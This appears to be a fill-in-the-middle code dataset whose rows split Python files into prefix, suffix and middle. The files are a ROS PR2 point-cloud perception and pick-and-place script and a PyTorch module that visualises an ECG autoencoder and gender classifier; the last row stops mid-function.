file_name (large_string, lengths 4-140) | prefix (large_string, lengths 0-39k) | suffix (large_string, lengths 0-36.1k) | middle (large_string, lengths 0-29.4k) | fim_type (large_string, 4 classes)
---|---|---|---|---|
project.py | #!/usr/bin/env python
# Import modules
import numpy as np
import sklearn
from sklearn.preprocessing import LabelEncoder
import pickle
from sensor_stick.srv import GetNormals
from sensor_stick.features import compute_color_histograms
from sensor_stick.features import compute_normal_histograms
from visualization_msgs.msg import Marker
from sensor_stick.marker_tools import *
from sensor_stick.msg import DetectedObjectsArray
from sensor_stick.msg import DetectedObject
from sensor_stick.pcl_helper import *
import rospy
import tf
from geometry_msgs.msg import Pose
from std_msgs.msg import Float64
from std_msgs.msg import Int32
from std_msgs.msg import String
from pr2_robot.srv import *
from rospy_message_converter import message_converter
import yaml
# Helper function to get surface normals
def | (cloud):
get_normals_prox = rospy.ServiceProxy('/feature_extractor/get_normals', GetNormals)
return get_normals_prox(cloud).cluster
# Helper function to create a yaml friendly dictionary from ROS messages
def make_yaml_dict(test_scene_num, arm_name, object_name, pick_pose, place_pose):
yaml_dict = {}
yaml_dict["test_scene_num"] = test_scene_num.data
yaml_dict["arm_name"] = arm_name.data
yaml_dict["object_name"] = object_name.data
yaml_dict["pick_pose"] = message_converter.convert_ros_message_to_dictionary(pick_pose)
yaml_dict["place_pose"] = message_converter.convert_ros_message_to_dictionary(place_pose)
return yaml_dict
# Helper function to output to yaml file
def send_to_yaml(yaml_filename, dict_list):
print "sending to yaml", dict_list
for d in dict_list:
print "test_scene_num", type(d["test_scene_num"]), "arm_name", type(d["arm_name"]), "object_name", type(d["object_name"]), "pick_pose", type(d["pick_pose"]), "place_pose", type(d["place_pose"])
data_dict = {"object_list": dict_list}
with open(yaml_filename, 'w') as outfile:
yaml.dump(data_dict, outfile, default_flow_style=False)
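# Rough sketch of the YAML layout this writes (the object name and pose values below
# are hypothetical placeholders, not taken from a real run):
# object_list:
# - arm_name: right
#   object_name: biscuits
#   pick_pose:
#     position:
#       x: 0.54
#       y: -0.24
#       z: 0.71
#     ...
#   place_pose:
#     ...
#   test_scene_num: 3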
def statistical_outlier_removal(cloud):
# Much like the previous filters, we start by creating a filter object:
outlier_filter = cloud.make_statistical_outlier_filter()
# Set the number of neighboring points to analyze for any given point
outlier_filter.set_mean_k(50)
# Set threshold scale factor
x = 0.9
# Any point whose mean distance to its neighbors is larger than (global mean distance + x * std_dev) will be considered an outlier
outlier_filter.set_std_dev_mul_thresh(x)
# Finally call the filter function for magic
cloud_filtered = outlier_filter.filter()
return cloud_filtered
def voxel_downsample(cloud):
""" Voxel Grid filter
Args:
cloud (PointCloud_PointXYZRGB): A point cloud
Returns:
PointCloud_PointXYZRGB: A downsampled point cloud
"""
# Create a VoxelGrid filter object for our input point cloud
vox = cloud.make_voxel_grid_filter()
# Choose a voxel (also known as leaf) size
LEAF_SIZE = 0.005
# Set the voxel (or leaf) size
vox.set_leaf_size(LEAF_SIZE, LEAF_SIZE, LEAF_SIZE)
# Call the filter function to obtain the resultant downsampled point cloud
cloud_filtered = vox.filter()
return cloud_filtered
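# Note: LEAF_SIZE is specified in meters, so 0.005 gives 5 mm voxels; the filter
# replaces all points falling inside each occupied 5 x 5 x 5 mm cube with their
# centroid. Larger leaf sizes downsample more aggressively at the cost of detail.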
def apply_passthrough_filter(cloud, axis, axis_min, axis_max):
""" Apply a passthrough filter to a cloud
Args:
cloud (PointCloud_PointXYZRGB): A point cloud
axis (str): Name of the field to filter on (e.g. 'z')
axis_min (float): Lower limit of the pass-through range
axis_max (float): Upper limit of the pass-through range
Returns:
PointCloud_PointXYZRGB: A filtered point cloud
"""
# Create a PassThrough filter object.
passthrough = cloud.make_passthrough_filter()
# Assign axis and range to the passthrough filter object.
filter_axis = axis
passthrough.set_filter_field_name(filter_axis)
#axis_min = 0.6
#axis_max = 1.1
passthrough.set_filter_limits(axis_min, axis_max)
# Finally use the filter function to obtain the resultant point cloud.
cloud_filtered = passthrough.filter()
return cloud_filtered
def ransac(cloud, sacmodel):
""" Segments a cloud using a sac model
Args:
cloud (PointCloud_PointXYZRGB): A point cloud
sacmodel (pcl.SACMODEL): A model points will be fit to
Returns:
A set of inliers and coefficients
"""
# Create the segmentation object
seg = cloud.make_segmenter()
# Set the model you wish to fit
seg.set_model_type(sacmodel)
seg.set_method_type(pcl.SAC_RANSAC)
# Max distance for a point to be considered fitting the model
# Experiment with different values for max_distance
# for segmenting the table
max_distance = 0.01
seg.set_distance_threshold(max_distance)
# Call the segment function to obtain set of inlier indices and model coefficients
inliers, coefficients = seg.segment()
return inliers, coefficients
def euclidean_clustering(cloud):
white_cloud = XYZRGB_to_XYZ(cloud)
tree = white_cloud.make_kdtree()
# Create a cluster extraction object
ec = white_cloud.make_EuclideanClusterExtraction()
# Set tolerances for distance threshold
# as well as minimum and maximum cluster size (in points)
ec.set_ClusterTolerance(0.01)
ec.set_MinClusterSize(10)
ec.set_MaxClusterSize(25000)
# Search the k-d tree for clusters
ec.set_SearchMethod(tree)
# Extract indices for each of the discovered clusters
cluster_indices = ec.Extract()
return cluster_indices, white_cloud
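# cluster_indices is a list of index lists: cluster_indices[j] holds the indices
# (into white_cloud) of the points belonging to cluster j.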
def color_clusters(cluster_indices, white_cloud):
#Assign a color corresponding to each segmented object in scene
cluster_color = get_color_list(len(cluster_indices))
color_cluster_point_list = []
for j, indices in enumerate(cluster_indices):
for i, indice in enumerate(indices):
color_cluster_point_list.append([white_cloud[indice][0],
white_cloud[indice][1],
white_cloud[indice][2],
rgb_to_float(cluster_color[j])])
#Create new cloud containing all clusters, each with unique color
cluster_cloud = pcl.PointCloud_PointXYZRGB()
cluster_cloud.from_list(color_cluster_point_list)
return cluster_cloud
# Callback function for your Point Cloud Subscriber
def pcl_callback(pcl_msg):
# Exercise-2 TODOs:
# Convert ROS msg to PCL data
pcl_data = ros_to_pcl(pcl_msg)
#filename = 'pcl_data.pcd'
#pcl.save(pcl_data, filename)
# Statistical Outlier Filtering
cloud_filtered = statistical_outlier_removal(pcl_data)
#filename = 'statistical_outlier_removal.pcd'
#pcl.save(cloud_filtered, filename)
# Voxel Grid Downsampling
cloud_filtered = voxel_downsample(cloud_filtered)
#filename = 'voxel_downsampled.pcd'
#pcl.save(cloud_filtered, filename)
# PassThrough Filter along z
axis_min = 0.6
axis_max = 1.1
cloud_filtered = apply_passthrough_filter(cloud_filtered, 'z', axis_min, axis_max)
#filename = 'pass_through_filtered.pcd'
#pcl.save(cloud_filtered, filename)
# PassThrough Filter along y
axis_min = -0.5
axis_max = 0.5
cloud_filtered = apply_passthrough_filter(cloud_filtered, 'y', axis_min, axis_max)
filename = 'pass_through_filtered_y.pcd'
pcl.save(cloud_filtered, filename)
# RANSAC Plane Segmentation
inliers, coefficients = ransac(cloud_filtered, pcl.SACMODEL_PLANE)
# Extract inliers and outliers
extracted_inliers = cloud_filtered.extract(inliers, negative=False)
#filename = 'extracted_inliers.pcd'
#pcl.save(extracted_inliers, filename)
extracted_outliers = cloud_filtered.extract(inliers, negative=True)
#filename = 'extracted_outliers.pcd'
#pcl.save(extracted_outliers, filename)
cloud_table = extracted_inliers
cloud_objects = extracted_outliers
# Euclidean Clustering
cluster_indices, white_cloud = euclidean_clustering(cloud_objects)
# Create Cluster-Mask Point Cloud to visualize each cluster separately
cluster_cloud = color_clusters(cluster_indices, white_cloud)
filename = 'colored_cluster_cloud.pcd'
pcl.save(cluster_cloud, filename)
# Convert PCL data to ROS messages
ros_cloud_table = pcl_to_ros(cloud_table)
ros_cloud_objects = pcl_to_ros(cloud_objects)
ros_cluster_cloud = pcl_to_ros(cluster_cloud)
# Publish ROS messages
pcl_objects_pub.publish(ros_cloud_objects)
pcl_table_pub.publish(ros_cloud_table)
pcl_cluster_pub.publish(ros_cluster_cloud)
# Exercise-3 TODOs:
# Classify the clusters! (loop through each detected cluster one at a time)
detected_objects_labels = []
detected_objects = []
for index, pts_list in enumerate(cluster_indices):
# Grab the points for the cluster
pcl_cluster = cloud_objects.extract(pts_list)
# Compute the associated feature vector
ros_cluster = pcl_to_ros(pcl_cluster)
sample_cloud = ros_cluster
chists = compute_color_histograms(sample_cloud, using_hsv=True)
normals = get_normals(sample_cloud)
nhists = compute_normal_histograms(normals)
feature = np.concatenate((chists, nhists))
# Make the prediction
prediction = clf.predict(scaler.transform(feature.reshape(1,-1)))
label = encoder.inverse_transform(prediction)[0]
detected_objects_labels.append(label)
# Publish a label into RViz
label_pos = list(white_cloud[pts_list[0]])
label_pos[2] += .4
object_markers_pub.publish(make_label(label,label_pos, index))
# Add the detected object to the list of detected objects.
do = DetectedObject()
do.label = label
do.cloud = ros_cluster
detected_objects.append(do)
rospy.loginfo('Detected {} objects: {}'.format(len(detected_objects_labels), detected_objects_labels))
# Publish the list of detected objects
detected_objects_pub.publish(detected_objects)
# Suggested location for where to invoke your pr2_mover() function within pcl_callback()
# Could add some logic to determine whether or not your object detections are robust
# before calling pr2_mover()
detected_objects_list = detected_objects
try:
pr2_mover(detected_objects_list)
except rospy.ROSInterruptException:
pass
# function to load parameters and request PickPlace service
def pr2_mover(object_list):
# TODO: Initialize variables
dict_list = []
# TODO: Get/Read parameters
object_list_param = rospy.get_param('/object_list')
dropbox_list_param = rospy.get_param('/dropbox')
# TODO: Parse parameters into individual variables
test_scene_num = Int32()
test_scene_num.data = 3
""" labels = []
centroids = [] # to be list of tuples (x, y, z)
for object in object_list:
labels.append(object.label)
points_arr = ros_to_pcl(object.cloud).to_array()
centroids.append(np.mean(points_arr, axis=0)[:3])
"""
# TODO: Rotate PR2 in place to capture side tables for the collision map
# TODO: Loop through the pick list
for object in object_list:
# TODO: Get the PointCloud for a given object and obtain its centroid
points_arr = ros_to_pcl(object.cloud).to_array()
c = np.mean(points_arr, axis=0)[:3]
centroid = map(np.asscalar, c)
print "type(centroid)", type(centroid), "[0]", type(centroid[0]), "[1]", type(centroid[1]), "[2]", type(centroid[2])
#centroids.append(np.mean(points_arr, axis=0)[:3])
object_name = String()
object_name.data = str(object.label)
# TODO: Create 'place_pose' for the object
group = None
for o in object_list_param:
if object.label == o['name']:
group = o['group']
print "for ", o['name'], "group found",group
object_arm_name = String()
place_pose = Pose()
for box in dropbox_list_param:
if group == box['group']:
# Assign the arm to be used for pick_place
object_arm_name.data = box['name']
place_pose.position.x = box['position'][0]
place_pose.position.y = box['position'][1]
place_pose.position.z = box['position'][2]
print "type(place_pose.x,y,z): (", type(place_pose.position.x), ",", type(place_pose.position.y), ",", type(place_pose.position.z), ")"
pick_pose = Pose()
pick_pose.position.x = centroid[0]
pick_pose.position.y = centroid[1]
pick_pose.position.z = centroid[2]
# TODO: Create a list of dictionaries (made with make_yaml_dict()) for later output to yaml format
yaml_dict = make_yaml_dict(test_scene_num, object_arm_name, object_name, pick_pose, place_pose)
dict_list.append(yaml_dict)
# Wait for 'pick_place_routine' service to come up
rospy.wait_for_service('pick_place_routine')
try:
pick_place_routine = rospy.ServiceProxy('pick_place_routine', PickPlace)
# Insert your message variables to be sent as a service request
resp = pick_place_routine(test_scene_num, object_name, object_arm_name, pick_pose, place_pose)
print ("Response: ",resp.success)
except rospy.ServiceException, e:
print "Service call failed: %s"%e
# Output your request parameters into output yaml file
yaml_filename = "output_" + str(test_scene_num.data) + ".yaml"
send_to_yaml(yaml_filename, dict_list)
if __name__ == '__main__':
# ROS node initialization
rospy.init_node('clustering', anonymous=True)
# Create Subscribers
#pcl_sub = rospy.Subscriber("/sensor_stick/point_cloud", pc2.PointCloud2, pcl_callback, queue_size=1)
pcl_cam_sub = rospy.Subscriber("/pr2/world/points", pc2.PointCloud2, pcl_callback, queue_size=1)
# Create Publishers
pcl_objects_pub = rospy.Publisher("/pcl_objects", PointCloud2, queue_size=1)
pcl_table_pub = rospy.Publisher("/pcl_table", PointCloud2, queue_size=1)
pcl_cluster_pub = rospy.Publisher("/pcl_cluster", PointCloud2, queue_size=1)
object_markers_pub = rospy.Publisher("/object_markers", Marker, queue_size=1)
detected_objects_pub = rospy.Publisher("/detected_objects", DetectedObjectsArray, queue_size=1)
# Load Model From disk
model = pickle.load(open('model.sav', 'rb'))
clf = model['classifier']
encoder = LabelEncoder()
encoder.classes_ = model['classes']
scaler = model['scaler']
# Initialize color_list
get_color_list.color_list = []
# Spin while node is not shutdown
while not rospy.is_shutdown():
rospy.spin()
| get_normals | identifier_name |
eval_functions.py | import os
import seaborn as sns
import torch
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import sklearn.metrics as metrics
from sklearn.manifold import TSNE
from torch.nn import ReLU
GENDER_ENUM = np.vectorize(lambda t: 'male' if t == 0 else 'female')
class GuidedBackprop:
"""
Produces gradients generated with guided back propagation from the given image
@author: Utku Ozbulak - github.com/utkuozbulak
source: https://github.com/utkuozbulak/pytorch-cnn-visualizations/blob/master/src/guided_backprop.py
"""
def __init__(self, model):
self.model = model
self.gradients = None
self.forward_relu_outputs = []
self.model.eval()
self.update_relus()
self.hook_layers()
def hook_layers(self):
def hook_function(module, grad_in, grad_out):
self.gradients = grad_in[0]
# Register hook to the first layer
first_block = list(self.model.encoder._modules.items())[0][1]
first_layer = list(first_block._modules.items())[0][1]
first_layer.register_backward_hook(hook_function)
def update_relus(self):
"""
Updates relu activation functions so that
1- stores output in forward pass
2- imputes zero for gradient values that are less than zero
"""
def relu_backward_hook_function(module, grad_in, grad_out):
"""
If there is a negative gradient, change it to zero
"""
# Get last forward output
corresponding_forward_output = self.forward_relu_outputs[-1]
corresponding_forward_output[corresponding_forward_output > 0] = 1
modified_grad_out = corresponding_forward_output * torch.clamp(grad_in[0], min=0.0)
del self.forward_relu_outputs[-1] # Remove last forward output
return (modified_grad_out,)
def relu_forward_hook_function(module, ten_in, ten_out):
"""
Store results of forward pass
"""
self.forward_relu_outputs.append(ten_out)
# Loop through layers, hook up ReLUs
for pos, module in self.model.encoder._modules.items():
if isinstance(module, ReLU):
module.register_backward_hook(relu_backward_hook_function)
module.register_forward_hook(relu_forward_hook_function)
def generate_gradients(self, input_signal, target_class):
# Forward pass
_, gender_pred = self.model(input_signal)
# Zero gradients
self.model.zero_grad()
# Target for backprop
one_hot_output = torch.FloatTensor(1, gender_pred.size()[-1]).zero_()
one_hot_output[0][target_class] = 1
# Backward pass
gender_pred.backward(gradient=one_hot_output)
gradients_as_arr = self.gradients.data.numpy()[0]
return gradients_as_arr.mean(axis=0)[0]
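# Minimal usage sketch (assumes `model` exposes the encoder / gender-prediction
# interface used above and `x` is a (1, 1, signal_length) float tensor):
# gbp = GuidedBackprop(model)
# saliency = gbp.generate_gradients(x, target_class=0)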
class SaveFeatures:
"""
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
"""
def __init__(self, module):
self.hook = module.register_forward_hook(self.hook_fn)
def hook_fn(self, module, input, output):
self.features = output
def close(self):
self.hook.remove()
def get_model_solver_paths(save_path, epoch):
"""
Gets the path to the model and solver of an epoch if specified or to
the best model and last solver if epoch is None
args:
save_path (str): Path to folder where models and solvers are stored
epoch (int): Epoch at which to load model and solver (use None for
best model and last solver)
returns:
model_path (str): Path to model
solver_path (str): Path to solver
"""
print("Getting model and solver paths")
model_paths = []
solver_paths = []
for _, _, fnames in os.walk(save_path):
model_paths = [fname for fname in fnames if 'model' in fname]
solver_paths = [fname for fname in fnames if 'solver' in fname]
if not model_paths or not solver_paths:
raise Exception('Model or solver not found.')
if not epoch:
model_path = os.path.join(save_path, 'best_model')
solver_path = os.path.join(save_path, sorted(solver_paths, key=lambda s: int(s.split("solver")[1]))[-1])
else:
model_path = os.path.join(save_path, 'model' + str(epoch))
solver_path = os.path.join(save_path, 'solver' + str(epoch))
return model_path, solver_path
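# Hypothetical usage (the save directory and the torch.load calls below are
# assumptions, not part of this module):
# model_path, solver_path = get_model_solver_paths('./saves/experiment_1', epoch=None)
# model = torch.load(model_path)
# solver = torch.load(solver_path)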
def show_reconstruction(dataset, model, num_samples, color='black'):
"""
Creates plots which show the input signal, the reconstructed signal
and the difference of the two next to each other
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
model (torch.nn.Module): pytorch autoencoder model
num_samples (int): Number of samples to plot
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# Create dataloader
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
# Get next batch
x, _ = next(iter(dataloader))
target = x
# Compute prediction and diff
pred, _ = model(x)
pred = pred.detach()
diff = target - pred
ymax = max(target.max(), pred.max())
ymin = min(target.min(), pred.min())
if len(x.shape) != 4:
target = target[:, :, :, None]
pred = pred[:, :, :, None]
diff = diff[:, :, :, None]
for i_channel in range(target.shape[-1]):
# Create plot
for i_sample in range(num_samples):
f, axes = plt.subplots(1, 3, figsize=(20, 5))
# f.suptitle("Input vs reconstruction, channel: {}".format(i_channel), fontsize=16)
# Label rows
labels = {0: 'Ground truth',
1: 'Prediction',
2: 'Deviation'}
for i in range(3):
plt.sca(axes[i])
axes[i].set_title(labels[i], rotation=0, size=16)
axes[i].set_ylim([ymin - .5, ymax + .5])
axes[i].tick_params(labelsize=12)
# Plot ground truth
axes[0].plot(target[i_sample, 0, :, i_channel].numpy())
# Plot prediction
axes[1].plot(pred[i_sample, 0, :, i_channel].numpy())
# Plot deviation
axes[2].plot(diff[i_sample, 0, :, i_channel].numpy())
plt.show()
def visualize_dataset(dataset, num_samples=10):
"""
Creates plots which show example signals from the dataset
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
num_samples (int): Number of samples to plot
"""
# Get signals
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
signals, _ = next(iter(dataloader))
signals = signals[:, 0].numpy()
# Display signals in plot
if num_samples == 1 or dataset.do_overfitting:
plt.title("Datasample to overfit on")
plt.plot(signals[0])
else:
f, axes = plt.subplots(num_samples, figsize=(8, 2 * num_samples))
f.suptitle("{} Preprocessed data samples".format(num_samples), fontsize=16)
for i_plot in range(num_samples):
axes[i_plot].plot(signals[i_plot])
plt.show(block=True)
def show_solver_history(solver, plot_train=True, plot_val=True, color='black'):
"""
Creates plots with the training history of a solver.
args:
solver (Solver): Solver used for training
plot_train (bool): Plot the training curves
plot_val (bool): Plot the validation curves
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
print("Stop reason: %s" % solver.stop_reason)
print("Stop time: %fs" % solver.training_time_s)
has_gender_loss = np.array(solver.history['val_gender_loss']).sum() > 0.
has_rec_loss = np.array(solver.history['val_rec_loss']).sum() > 0.
train_loss = np.array(solver.history['train_loss'])
if has_rec_loss:
train_rec_loss = np.array(solver.history['train_rec_loss'])
val_rec_loss = np.array(solver.history['val_rec_loss'])
if has_gender_loss:
train_gender_loss = np.array(solver.history['train_gender_loss'])
val_gender_loss = np.array(solver.history['val_gender_loss'])
plt.figure(figsize=(20, 10))
if plot_train:
|
if plot_val:
if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_rec_loss)),
val_rec_loss, label='Val Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_gender_loss)),
val_gender_loss, label='Val Gender loss')
plt.xlabel("Iterations", fontsize=18)
plt.ylabel("Train/Val loss", fontsize=18)
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
legend = plt.legend(fontsize=14)
for text in legend.get_texts():
text.set_color("black")
plt.show()
if has_rec_loss:
print("Final training reconstruction loss: {}".format(
train_rec_loss[-1]))
print("Final validation reconstruction loss: {}".format(
val_rec_loss[-1]))
if has_gender_loss:
print("Final training gender loss: {}".format(train_gender_loss[-1]))
print("Final validation gender loss: {}".format(val_gender_loss[-1]))
def plot_gender_prediction(gender, gender_pred, color='black'):
"""
Create plot for the confusion matrix for binary gender prediction and
compute accuracy, precision and recall scores
args:
gender (np.array): one-hot encoded array of true gender values
gender_pred (np.array): one-hot encoded array of predicted gender values
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# get confusion matrix
cm = metrics.confusion_matrix(gender, gender_pred)
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
# compute scores
accuracy_score = metrics.accuracy_score(gender, gender_pred)
precision_score = metrics.precision_score(gender, gender_pred)
recall_score = metrics.recall_score(gender, gender_pred)
# plot figures
plt.figure(figsize=(8, 8))
sns.set(font_scale=1.2)
sns.heatmap(
cm,
annot=True,
xticklabels=['M', 'F'],
yticklabels=['M', 'F'],
fmt=".3f",
linewidths=.5,
square=True,
cmap='Blues',
)
plt.ylabel('Actual label', fontsize=18)
plt.xlabel('Predicted label', fontsize=18)
all_sample_title = 'Accuracy: {:.3f}\nPrecision: {:.3f}\nRecall: {:.3f}\n'.format(
accuracy_score, precision_score, recall_score)
plt.title(all_sample_title, size=22)
def plot_t_sne(embedding, labels, info, color='black'):
"""
Plot the T-SNE graph of an embedding
args:
embedding (np.array): embedding of the autoencoder
labels (np.array): labels of the embedding
info (list of str, len=2): state which embedding (e.g. 'validation set')
and what kind of labels (e.g. 'gender')
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
tsne = TSNE(n_components=2).fit_transform(embedding)
plt.figure(figsize=(20, 12))
plt.title("T-SNE of {} embedding with {} labels\n".format(
info[0], info[1]), fontsize=20)
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
sns.scatterplot(
x=tsne[:, 0], y=tsne[:, 1],
hue=labels,
palette=sns.color_palette("hls", 2),
legend="full",
alpha=0.5
)
l = plt.legend(['F', 'M'], fontsize=16)
for text in l.get_texts():
text.set_color("black")
def plot_saliency_map_sample(model, x, gender, threshold=0.1, color='black'):
"""
Create plot of signal where points with a high saliency score are
highlighted
args:
model (nn.Module): gender classification model
x (torch.tensor): input signal, shape: (1, 1, signal_length)
gender (int): true gender class
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
GBP = GuidedBackprop(model)
colors = ['blue', 'red']
grads = GBP.generate_gradients(x, gender)
_, score = model(x)
score = torch.nn.functional.softmax(score, dim=1)
score = score[0].detach().numpy()
indices = np.argwhere(np.abs(grads) > threshold)
x = x[0, 0].detach().numpy()
plt.figure(figsize=(20, 4))
plt.title("Saliency map of a {} sample, score: {} (0: male, 1: female)".format(
GENDER_ENUM(gender), score), fontsize=22)
plt.plot(x, color='gray')
plt.scatter(indices, x[indices], marker='o', color=colors[gender])
plt.show()
def plot_saliency_maps(model, dataset, num_samples, threshold=0.1, color='black'):
"""
Create saliency maps for num_samples random samples
args:
model (nn.Module): gender classification model
dataset (torch.utils.data.Dataset): dataset with ecg signals
num_samples (int): number of saliency maps to be plotted
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
data_loader = torch.utils.data.DataLoader(dataset, shuffle=True)
for i_sample in range(num_samples):
x, _, gender = next(iter(data_loader))
gender = gender[0]
plot_saliency_map_sample(model, x, gender, threshold, color)
def plot_selected_saliency_maps(
model, x, gender, num_samples,
inverted=False, score_threshold=0.95,
plot_threshold=0.1, color='black'):
"""
Create saliency maps for num_samples samples which have a high
classification score
args:
model (nn.Module): gender classification model
x (torch.tensor): tensor with input signals (preferably large)
gender (np.array): corresponding true gender classes
num_samples (int): maximum number of saliency maps to be plotted
inverted (bool): If true, show samples which are confidently wrong
classified by the model
score_threshold (float): Threshold for the classification score. Only
samples with higher classification score will
be considered
plot_threshold (float): Threshold for the saliency score. Only saliency
scores above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
_, logits = model(x)
scores = torch.nn.functional.softmax(logits, dim=1).detach().numpy()
if inverted:
male = 1
female = 0
else:
male = 0
female = 1
# Plot male
num_plotted = 0
max_idx = np.argwhere(scores[:, 0] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == male:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
# Plot female
num_plotted = 0
max_idx = np.argwhere(scores[:, 1] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == female:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
def create_signal_which_maximizes_activation(model, layer, filt, input_size,
lr=0.1, opt_steps=100,
upscaling_steps=5,
upscaling_factor=2.0,
color='black'):
"""
Create plot of artificial signal which maximizes the activation of
a filter at a layer in a model using gradient ascent
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
args:
model (nn.Module): any convolutional model
layer (int): index of layer
filt (int): index of filter
input_size (int): length of the input signal expected by the model
lr (float): learning rate for gradient ascent optimizer
opt_steps (int): number of training steps for gradient ascent
upscaling_steps (int): number of upscaling steps during training
upscaling_factor (float): factor of upscaling
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
img_var = torch.randn((1, 1, int(input_size * ((1 / upscaling_factor)**upscaling_steps))))
activations = SaveFeatures(list(model.children())[layer])
optimizer = torch.optim.Adam(
[img_var.requires_grad_()], lr=lr, weight_decay=1e-6)
loss_history = []
for step in range(upscaling_steps + 1):
for n in range(opt_steps):
optimizer.zero_grad()
model(img_var)
loss = -activations.features[:, filt].mean()
loss_history.append(loss)
loss.backward()
optimizer.step()
if step < upscaling_steps:
img_var = torch.nn.functional.interpolate(
img_var, scale_factor=upscaling_factor, mode='linear')
plt.figure(figsize=(20, 4))
plt.plot(img_var.clone().detach().numpy()[0, 0])
plt.title("Input which maximizes activation of layer: conv_{}, filter: {}".format(
layer + 1, filt), fontsize=22)
plt.show()
return img_var
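# Hypothetical call (layer index, filter index and input size are illustrative only):
# signal = create_signal_which_maximizes_activation(model, layer=0, filt=3, input_size=1000)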
def create_signal_which_maximizes_class_score(
model, target_class, input_size, lr=0.1, iterations=500, color='black'):
"""
Create plot of artificial signal which maximizes the score of a target class
using gradient ascent
args:
model (nn.Module): any model
input_size (int): length of the input signal expected by the model
lr (float): learning rate for gradient ascent optimizer
iterations (int): number of training steps for gradient ascent
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
model.eval()
img_var = torch.randint(-4, 4, (1, 1, input_size), dtype=torch.float32)
img_var.requires_grad = True
optimizer = torch.optim.SGD([img_var], lr=lr)
for i in range(1, iterations):
_, gender_pred = model(img_var)
class_loss = -gender_pred[0, target_class]
print('Iteration:', str(i), 'Loss', "{0:.2f}".format(
class_loss.data.numpy()))
model.zero_grad()
class_loss.backward()
optimizer.step()
plt.plot(img_var[0, 0].detach().numpy())
plt.show()
| if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_rec_loss)),
train_rec_loss, label='Train Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_gender_loss)),
train_gender_loss, label='Train Gender loss') | conditional_block
eval_functions.py | import os
import seaborn as sns
import torch
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import sklearn.metrics as metrics
from sklearn.manifold import TSNE
from torch.nn import ReLU
GENDER_ENUM = np.vectorize(lambda t: 'male' if t == 0 else 'female')
class GuidedBackprop:
"""
Produces gradients generated with guided back propagation from the given image
@author: Utku Ozbulak - github.com/utkuozbulak
source: https://github.com/utkuozbulak/pytorch-cnn-visualizations/blob/master/src/guided_backprop.py
"""
def __init__(self, model):
self.model = model
self.gradients = None
self.forward_relu_outputs = []
self.model.eval()
self.update_relus()
self.hook_layers()
def hook_layers(self):
def hook_function(module, grad_in, grad_out):
self.gradients = grad_in[0]
# Register hook to the first layer
first_block = list(self.model.encoder._modules.items())[0][1]
first_layer = list(first_block._modules.items())[0][1]
first_layer.register_backward_hook(hook_function)
def update_relus(self):
"""
Updates relu activation functions so that
1- stores output in forward pass
2- imputes zero for gradient values that are less than zero
"""
def | (module, grad_in, grad_out):
"""
If there is a negative gradient, change it to zero
"""
# Get last forward output
corresponding_forward_output = self.forward_relu_outputs[-1]
corresponding_forward_output[corresponding_forward_output > 0] = 1
modified_grad_out = corresponding_forward_output * torch.clamp(grad_in[0], min=0.0)
del self.forward_relu_outputs[-1] # Remove last forward output
return (modified_grad_out,)
def relu_forward_hook_function(module, ten_in, ten_out):
"""
Store results of forward pass
"""
self.forward_relu_outputs.append(ten_out)
# Loop through layers, hook up ReLUs
for pos, module in self.model.encoder._modules.items():
if isinstance(module, ReLU):
module.register_backward_hook(relu_backward_hook_function)
module.register_forward_hook(relu_forward_hook_function)
def generate_gradients(self, input_signal, target_class):
# Forward pass
_, gender_pred = self.model(input_signal)
# Zero gradients
self.model.zero_grad()
# Target for backprop
one_hot_output = torch.FloatTensor(1, gender_pred.size()[-1]).zero_()
